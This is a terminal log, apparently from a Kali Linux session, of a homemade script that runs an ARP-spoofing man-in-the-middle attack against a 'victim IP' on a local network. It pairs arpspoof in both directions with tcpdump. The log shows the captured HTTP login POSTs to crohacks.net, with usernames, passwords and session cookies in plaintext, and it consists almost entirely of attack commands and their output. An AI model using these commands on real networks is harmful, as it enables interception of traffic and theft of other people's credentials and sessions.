- 0 packets received by filter
- 0 packets dropped by kernel
- root@kali:~/Desktop/scripts# nano midm.bash
- root@kali:~/Desktop/scripts# ./midm.bash
- Enter victim IP followed by [ENTER]
- 192.168.1.13
- gnome-terminal -x sh -c "arpspoof -i wlan0 -t 192.168.1.13 192.168.1.1;/bin/bash"
- gnome-terminal -x sh -c "arpspoof -i wlan0 -t 192.168.1.1 192.168.1.13;/bin/bash"
- Do you wish to [r]ead or [w]rite tcpdump output?
- r
- tcpdump -s 0 -i wlan0 -A host 192.168.1.13 and tcp port http;/bin/bash
- tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
- listening on wlan0, link-type EN10MB (Ethernet), capture size 262144 bytes
- 01:21:31.250436 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [S], seq 2634145743, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
- E..4n^@...1.....h.1.b..P.......... .................
- 01:21:31.250463 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [S], seq 2634145743, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
- E..4n^@...2.....h.1.b..P.......... .................
- 01:21:31.261870 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 688909077, win 16425, length 0
- E..(n_@...1.....h.1.b..P....)...P.@)!w..
- 01:21:31.261894 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 1, win 16425, length 0
- E..(n_@...2.....h.1.b..P....)...P.@)!w..
- 01:21:31.265321 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [P.], seq 0:690, ack 1, win 16425, length 690: HTTP: POST /userlogin.php HTTP/1.1
- E...n`@.........h.1.b..P....)...P.@)| ..POST /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Content-Length: 50
- Cache-Control: max-age=0
- Origin: http://www.crohacks.net
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149
- username=asd123&password=testpassword&submit=Login
- 01:21:31.265337 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [P.], seq 0:690, ack 1, win 16425, length 690: HTTP: POST /userlogin.php HTTP/1.1
- E...n`@.../.....h.1.b..P....)...P.@)| ..POST /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Content-Length: 50
- Cache-Control: max-age=0
- Origin: http://www.crohacks.net
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149
- username=asd123&password=testpassword&submit=Login
- 01:21:31.413801 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 505, win 16299, length 0
- E..(na@...1.....h.1.b..P....)...P.?..K..
- 01:21:31.413833 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 505, win 16299, length 0
- E..(na@...2.....h.1.b..P....)...P.?..K..
- 01:21:31.416923 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [P.], seq 690:1275, ack 505, win 16299, length 585: HTTP: GET /userlogin.php HTTP/1.1
- E..qnb@.../C....h.1.b..P....)...P.?.E...GET /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
- 01:21:31.416944 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [P.], seq 690:1275, ack 505, win 16299, length 585: HTTP: GET /userlogin.php HTTP/1.1
- E..qnb@...0C....h.1.b..P....)...P.?.E...GET /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
- 01:21:31.488643 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 3258, win 16425, length 0
- E..(nc@...1.....h.1.b..P....)...P.@)....
- 01:21:31.488676 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 3258, win 16425, length 0
- E..(nc@...2.....h.1.b..P....)...P.@)....
- 01:21:33.251912 IP 192.168.1.13.25018 > bud02s24-in-f16.1e100.net.http: Flags [.], seq 56568081:56568082, ack 3800290246, win 16445, length 1: HTTP
- E..)ng@..........:..a..P._).....P.@=.....
- 01:21:33.251932 IP 192.168.1.13.25018 > bud02s24-in-f16.1e100.net.http: Flags [.], seq 0:1, ack 1, win 16445, length 1: HTTP
- E..)ng@..........:..a..P._).....P.@=.....
- ^C
- 14 packets captured
- 14 packets received by filter
- 0 packets dropped by kernel
- root@kali:~/Desktop/scripts# ./midm.bash
- Enter victim IP followed by [ENTER]
- 192.168.1.13
- gnome-terminal -x sh -c "arpspoof -i wlan0 -t 192.168.1.13 192.168.1.1;/bin/bash"
- gnome-terminal -x sh -c "arpspoof -i wlan0 -t 192.168.1.1 192.168.1.13;/bin/bash"
- Do you wish to [r]ead or [w]rite tcpdump output?
- r
- tcpdump -s 0 -i wlan0 -A host 192.168.1.13 and tcp port http;/bin/bash
- tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
- listening on wlan0, link-type EN10MB (Ethernet), capture size 262144 bytes
- 01:23:05.544991 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [S], seq 1481341901, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
- E..4s.@...,D....h.1.b..PXK{....... .................
- 01:23:05.545050 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [S], seq 1481341901, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
- E..4s.@...-D....h.1.b..PXK{....... .................
- 01:23:05.557082 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 3840930751, win 16425, length 0
- E..(s.@...,O....h.1.b..PXK{.....P.@)....
- 01:23:05.557095 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 1, win 16425, length 0
- E..(s.@...-O....h.1.b..PXK{.....P.@)....
- 01:23:05.557110 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [P.], seq 0:725, ack 1, win 16425, length 725: HTTP: POST /userlogin.php HTTP/1.1
- E...s.@...)y....h.1.b..PXK{.....P.@)x...POST /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Content-Length: 43
- Cache-Control: max-age=0
- Origin: http://www.crohacks.net
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
- username=testing&password=heki&submit=Login
- 01:23:05.557120 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [P.], seq 0:725, ack 1, win 16425, length 725: HTTP: POST /userlogin.php HTTP/1.1
- E...s.@...*y....h.1.b..PXK{.....P.@)x...POST /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Content-Length: 43
- Cache-Control: max-age=0
- Origin: http://www.crohacks.net
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
- username=testing&password=heki&submit=Login
- 01:23:05.644022 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 404, win 16324, length 0
- E..(s.@...,M....h.1.b..PXK~....RP.?.....
- 01:23:05.644057 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 404, win 16324, length 0
- E..(s.@...-M....h.1.b..PXK~....RP.?.....
- 01:23:05.647147 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [P.], seq 725:1310, ack 404, win 16324, length 585: HTTP: GET /userlogin.php HTTP/1.1
- E..qs.@...*.....h.1.b..PXK~....RP.?.)c..GET /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
- 01:23:05.647165 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [P.], seq 725:1310, ack 404, win 16324, length 585: HTTP: GET /userlogin.php HTTP/1.1
- E..qs.@...+.....h.1.b..PXK~....RP.?.)c..GET /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
- 01:23:05.724867 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 3157, win 16425, length 0
- E..(s.@...,K....h.1.b..PXK......P.@).$..
- 01:23:05.724898 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 3157, win 16425, length 0
- E..(s.@...-K....h.1.b..PXK......P.@).$..
- ^C